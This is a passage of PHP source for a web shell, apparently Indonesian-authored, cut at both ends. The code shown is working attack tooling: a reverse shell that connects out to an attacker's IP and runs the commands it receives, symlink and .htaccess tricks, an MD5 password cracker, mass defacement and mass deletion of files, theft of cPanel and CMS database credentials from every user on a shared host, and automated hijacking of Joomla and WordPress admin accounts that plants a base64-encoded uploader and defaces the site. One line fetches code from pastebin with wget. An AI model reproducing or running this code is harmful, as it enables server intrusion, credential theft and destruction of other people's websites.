PHP VERSION: ';echo phpversion();
$fichier = $_POST['file'];
$ac = $_POST['ac'];
$symlink = $_POST['symlink'];
if ($symlink)
{
$dir = "ctt";
if(file_exists($dir)) {
echo "
gagal symlink
";
} else {
@mkdir($dir); {
echo "
folder config berhasil di buat <3
";
echo "
$ac <= file symlinknya kaka
";
} }
// Extract Priv8 htaccess File //
$Priv8 = "#Priv8 htaccess By AnonCoders
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
DirectoryIndex $ac
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
Options All
Options All
";
$f =@fopen ('ctt/.htaccess','w');
@fwrite($f , $Priv8);
@symlink("$fichier","ctt/$ac");
echo '
'.$ac.'';
}
}
///////////////////////////////////////////
elseif($_GET['do'] == 'bc2') {
echo "
Back Connector v2
Usage: nc -vv -l -p 21
";
#vars connected with html
$ip=$_POST['ip'];
$port=$_POST['port'];
if ($ip <> "")
{
$mucx=fsockopen($ip , $port , $errno, $errstr );
if (!$mucx){
$result = "Error: Connection failed !";
}
else {
$zamazing0="\n";
fputs ($mucx ,"\nWelcome back user\n\n");
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
fputs ($mucx);
$one="[$";
$two="]";
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}
}
///////////////////////////////////////////
elseif($_GET['do'] == 'bc') {
echo "
";
$md5hash=$_POST['md5hash'];
$passw0rds=explode("\n",$_POST['passw0rds']);
if($_POST['crack']){
foreach( $passw0rds as $passwords){
if((@md5(trim($passwords))==$md5hash)==true){
echo "".""."Password Found : ".""."".$passwords.""."".""."
";
echo "
".""."--[ Done ]--"."".""."
";
break;
}
elseif((@md5(trim($passwords))==$md5hash)==false){
echo "
".""."Wrong Password : ".""."".$passwords."".""."
";
echo "
".""."--[ ... ]--"."".""."
";
}}}}
///////////////////////////////////////////
elseif($_GET['do'] == 'vhost') {
echo "
";
}
///////////////////////////////////////////
elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
DONE] $lokasi
";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function sabun_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[
DONE] $lokasi
";
file_put_contents($lokasi, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe_sabun'] == 'mahal') {
echo "
";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "
";
} elseif($_POST['tipe_sabun'] == 'murah') {
echo "
";
sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "
";
}
} else {
echo "
";
echo "";
}
}
////////////////////////////////////////
elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[
DELETED] $lokasi
";
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "
";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "
";
} else {
echo "
";
echo "";
}
}
/////////////////////////////////////////////////
elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r");
$idx = mkdir("ctt_config", 0777);
$isi_htc = "Options all\nRequire None\nSatisfy Any";
$htc = fopen("ctt_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "
Can't read /etc/passwd";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_ctt) {
$user_config_dir = "/home/$user_ctt/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_ctt/.my.cnf" => "cpanel",
"/home/$user_ctt/.accesshash" => "WHM-accesshash",
"/home/$user_ctt/public_html/vdo_config.php" => "Voodoo",
"/home/$user_ctt/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_ctt/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_ctt/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_ctt/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_ctt/public_html/forum/config.php" => "phpBB",
"/home/$user_ctt/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_ctt/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_ctt/public_html/app/etc/local.xml" => "Magento",
"/home/$user_ctt/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_ctt/public_html/configuration.php" => "Joomla",
"/home/$user_ctt/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/site/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/blog/wp-config.php" => "WordPress",
"/home/$user_ctt/public_html/admin/config.php" => "OpenCart",
"/home/$user_ctt/public_html/slconfig.php" => "Sitelok",
"/home/$user_ctt/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("ctt_config/$user_ctt-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "
Done";
}
/////////////////////////////////////////
elseif($_GET['do'] == 'auto_wp') {
if($_POST['hajar']) {
$title = htmlspecialchars($_POST['new_title']);
$pn_title = str_replace(" ", "-", $title);
if($_POST['cek_edit'] == "Y") {
$script = $_POST['edit_content'];
} else {
$script = $title;
}
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/WordPress/", $config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."posts";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
echo "
";
if($target == '') {
echo "URL:
error, gabisa ambil nama domain nya -> ";
} else {
echo "URL:
$target/?p=$id -> ";
}
if(!$update OR !$conn OR !$db) {
echo "
MySQL Error: ".mysql_error()."";
} else {
echo "
sukses di ganti.";
}
echo "
";
mysql_close($conn);
}
}
} else {
echo "
Auto Edit Title+Content WordPress
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";
}
}
/////////////////////////////////////////
elseif($_GET['do'] == 'sc') {
set_time_limit (0);
ini_get('max_execution_time');
function isSiteOnline($url){
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";$ch=curl_init();
curl_setopt ($ch, CURLOPT_URL,$url );
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch,CURLOPT_VERBOSE,false);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$page=curl_exec($ch);
//echo curl_error($ch);
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if($httpcode>=200 && $httpcode<300){
return true;
} else {
return false;
}
}
if(isset($_POST["submit"])){
$count = array('on', 'off');
$shell = $_POST["shell"];
$shell2 = explode("\n",$shell);
$str = "";
foreach($shell2 as $val){
$x = trim($val, "\r");
$x = trim($x, "\n");
if(isSiteOnline($x)){
$content = "$x \n";
$str .= "$x \n";
$count['on']++;
} else {
$count['off']++;
echo "";
}
}
echo "Online Shells
";
echo '
['.$count['on'].']'.' Shells online '.'['.$count['off'].']'.' Shells offline
';
echo "";
echo "";
} else {
echo "Shell Checker
";
}
}
/////////////////////////////////////////
elseif($_GET['do'] == 'joomlaad') {
error_reporting(0);
if($_POST['submitt']){
function pereg($anu,$pereg){
$ch2 = curl_init ("$anu");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch2);
preg_match("/$pereg/", $data, $token1);
return $token1[1];
}
function ngecurl($sites){
$ch1 = curl_init ("$sites");
curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch1);
return $data;
}
function ambilkata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
$post2 = array(
"username" => "$fak1",
"passwd" => "$fak2",
"lang" => "en-GB",
"option" => "com_login",
"task" => "login",
"return" => "$fak3",
"$fak4" => "1",
);
$ch = curl_init ("$fak5");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$prett = curl_exec($ch);
return $prett;
}
$host = $_POST['host'];
$username = $_POST['username'];
$password = $_POST['password'];
$db = $_POST['db'];
$dbprefix = $_POST['dbprefix'];
$user_baru = $_POST['user_baru'];
$password_baru = $_POST['password_baru'];
$tanya = $_POST['tanya'];
$target = $_POST['target'];
$hackedby = $_POST['hackedby'];
$prefix = $dbprefix."users";
$pass = md5("$password_baru");
$upda = $db.".".$dbprefix;
mysql_connect($host,$username,$password);
mysql_select_db($db);
$tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$r=mysql_fetch_array($tampil);
$id = $r[id];
mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
if ($tanya == "y"){
$path = "/administrator/index.php?option=com_templates&view=templates";
$site = $target.$path;
$token1 = pereg($site, '');
$token2 = pereg($site, '');
//Login
$aso2 = lohgin($user_baru,$password_baru,$token1,$token2,$site);
$aso = ngecurl($site);
$id = ambilkata($aso, "/administrator/index.php?option=com_templates&view=template&id=","&file=aG9tZQ==\">");
echo "# ID -> $id ....
";
$file_index = base64_encode("/index.php");
$akaa = "/administrator/index.php?option=com_templates&view=template&id=$id&file=$file_index";
$ak = $target.$akaa;
$fakk = ngecurl($ak);
$ambil_extensi = ambilkata($fakk, 'id="jform_extension_id" value="','" />');
$file_value = ambilkata($fakk, 'id="jform_filename" value="','" />');
$nama_template = ambilkata($fakk, 'Editing file "/index.php" in template "','".');
echo "# jform_extension_id -> $ambil_extensi
";
echo "# filename -> $file_value
";
echo "# Template -> $nama_template
";
$upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
$coeg = "$target/administrator/index.php?option=com_templates&view=template&id=$id&file=$file_index";
echo "# $coeg
";
echo "# Uploading...
";
$token3 = pereg($coeg, '');
echo "# Token3 -> $token3
";
$post2 = array(
"jform[source]" => "$upload",
"task" => "template.save",
"$token3" => "1",
"jform[extension_id]"=> "$ambil_extensi",
"jform[filename]" => "$file_value",
);
$ch3 = curl_init ("$coeg");
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
$masuk22 = curl_exec ($ch3);
$uploader = "$target/templates/$nama_template/index.php";
$masuk2 = ngecurl($uploader);
if(preg_match("#ganteng#is", $masuk2)){
echo "# uploader udh ketanem...
";
echo "# lanjut mepes...
";
$www = "m.php";
$fp5 = fopen($www,"w");
fputs($fp5,$hackedby);
$ch4 =curl_init("$target/templates/$nama_template/index.php");
curl_setopt($ch4, CURLOPT_POST, true);
curl_setopt($ch4, CURLOPT_POSTFIELDS,
array('file'=>"@$www"));
curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
$postResult = curl_exec($ch4);
curl_close($ch4);
$ch5 = "$target/k.php";
$file2 = @file_get_contents($ch5);
if(preg_match('#hacked#is', $file2)){
echo "# berhasil mepes...
";
echo "$target/k.php
";
}
else{
echo "# gagal mepes...
";
echo "# coba aja manual:
";
echo "# $target/administrator
";
echo "# username: $user_baru
";
echo "# password: $password_baru
";
}
}
else{
echo "# failed
";
echo "# data udh bener. beda versi joomla mungkin :(
";
echo "# coba aja manual:
";
echo "# $target/administrator
";
echo "# username: $user_baru
";
echo "# password: $password_baru
";
echo "# atau coba yg path 2
";
system('wget http://pastebin.com/raw.php?i=HgWSj00f');
system('cp raw.php?i=HgWSj00f joomla-2.php');
echo "Disini..
";
}
}
elseif($tanya == "n"){
echo "# Sukses
";
echo "# username: $user_baru
";
echo "# password: $password_baru
";
}
}
else{
echo '
Joomla Auto Deface v1.2
Joomla auto deface
*nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
';
}
}
/////////////////////////////////////////
elseif($_GET['do'] == 'joomlaaeu') {
error_reporting(0);
//Tu5b0l3d
//thx to: IndoXploit, Hacker-Newbie.org
if($_POST['submitt']){
$host = $_POST['host'];
$username = $_POST['username'];
$password = $_POST['password'];
$db = $_POST['db'];
$dbprefix = $_POST['dbprefix'];
$user_baru = $_POST['user_baru'];
$password_baru = $_POST['password_baru'];
$tanya = $_POST['tanya'];
$prefix = $dbprefix."users";
$pass = md5("$password_baru");
$upda = $db.".".$dbprefix;
mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
$tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$r=mysql_fetch_array($tampil);
$id = $r[id];
mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
function token($target){
$ch2 = curl_init ("$target");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
$data = curl_exec ($ch2);
preg_match('/ "$user_baru",
"passwd" => "$password_baru",
"lang" => "en-GB",
"option" => "com_login",
"task" => "login",
"return" => "aW5kZXgucGhw",
"$token1" => "1",
);
$ch = curl_init ("$site");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$masuk = curl_exec ($ch);
$token2 = token($site);
$upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
$post2 = array(
"jform[source]" => "$upload",
"task" => "template.save",
"$token2" => "1",
"jform[extension_id]"=> "503",
"jform[filename]" => "/error.php",
);
$ch3 = curl_init ("$site");
curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch3, CURLOPT_POST, 1);
curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
$masuk2 = curl_exec ($ch3);
if(preg_match("#successfully#is", $masuk2)){
echo "uploader udh ketanem...
";
echo "lanjut mepes...
";
$file_pepes = "hacked.php";
$ch4 =curl_init("$target/templates/beez3/error.php");
curl_setopt($ch4, CURLOPT_POST, true);
curl_setopt($ch4, CURLOPT_POSTFIELDS,
array('file'=>"@$file_pepes"));
curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
$postResult = curl_exec($ch4);
curl_close($ch4);
$ch5 =curl_init("$target/k.php");
curl_setopt($ch5, CURLOPT_POST, true);
curl_setopt($ch5, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch5, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch5, CURLOPT_SSL_VERIFYHOST, 0);
$postResult2 = curl_exec($ch5);
if(preg_match('#hacked#is', $postResult2)){
echo "berhasil mepes...
";
echo "$target/k.php
";
}
else{
echo "gagal mepes...
";
echo "coba aja manual:
";
echo "$target/administrator
";
echo "username: $user_baru
";
echo "password: $password_baru
";
}
}
else{
echo "failed
";
echo "data udh bener. beda template mungkin :(
";
echo "coba aja manual:
";
echo "$target/administrator
";
echo "username: $user_baru
";
echo "password: $password_baru
";
}
curl_close($ch3);
curl_close($ch);
}
elseif($tanya == "n"){
echo "Sukses
";
echo "username: $user_baru
";
echo "password: $password_baru
";
}
}
else{
echo '
Edit user in joomla
Edit user in joomla
*nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
';
}
}
/////////////////////////////////////////
elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "";
$etc = fopen("/etc/passwd", "r");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "
Can't read /etc/passwd";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_ctt_jump) {
$user_jumping_dir = "/home/$user_ctt_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[
R]
$user_jumping_dir";
if(is_writable($user_jumping_dir)) {
$jrw = "[
RW]
$user_jumping_dir";
}
echo $jrw;
if(function_exists('posix_getpwuid')) {
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => (
gabisa ambil nama domain nya )
";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_ctt_jump) {
echo " => (
$dj )
";
break;
}
}
}
} else {
echo "
";
}
}
}
}
}
if($i == 0) {
} else {
echo "
Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
}
echo "
";
}
////////////////////////////////////////////////
elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."
";
echo "CMS => Joomla
";
if($site == '') {
echo "Sitename => error, gabisa ambil nama domain nya
";
} else {
echo "Sitename => $site
";
}
if(!$update OR !$conn OR !$db) {
echo "Status => ".mysql_error()."
";
} else {
echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "Login => error, gabisa ambil nama domain nyaa
";
} else {
$url_target = "Login => $target/wp-login.php
";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "Config => ".$file_conf."
";
echo "CMS => Wordpress
";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => ".mysql_error()."
";
} else {
echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"");
$dbuser = ambilkata($config,"");
$dbpass = ambilkata($config,"");
$dbname = ambilkata($config,"");
$dbprefix = ambilkata($config,"");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "Login => error, gabisa ambil nama domain nyaa
";
} else {
$url_target = "Login => $target/admin/
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."
";
echo "CMS => Magento
";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => ".mysql_error()."
";
} else {
echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
";
}
mysql_close($conn);
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
$dbuser = ambilkata($config,"'DB_USERNAME', '","'");
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
$dbname = ambilkata($config,"'DB_DATABASE', '","'");
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
$prefix = $dbprefix."user";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$target = ambilkata($config,"HTTP_SERVER', '","'");
if($target == '') {
$url_target = "Login => error, gabisa ambil nama domain nyaa
";
} else {
$url_target = "Login => $target
";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "Config => ".$file_conf."
";
echo "CMS => OpenCart
";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "Status => ".mysql_error()."
";
} else {
echo "Status => sukses edit user, silakan login dengan user & pass yang baru.
";
}
mysql_close($conn);
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
$dbhost = ambilkata($config,'server = "','"');
$dbuser = ambilkata($config,'username = "','"');
$dbpass = ambilkata($config,'password = "','"');
$dbname = ambilkata($config,'database = "','"');
$prefix = "users";
$option = "identitas";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
$result = mysql_fetch_array($q);
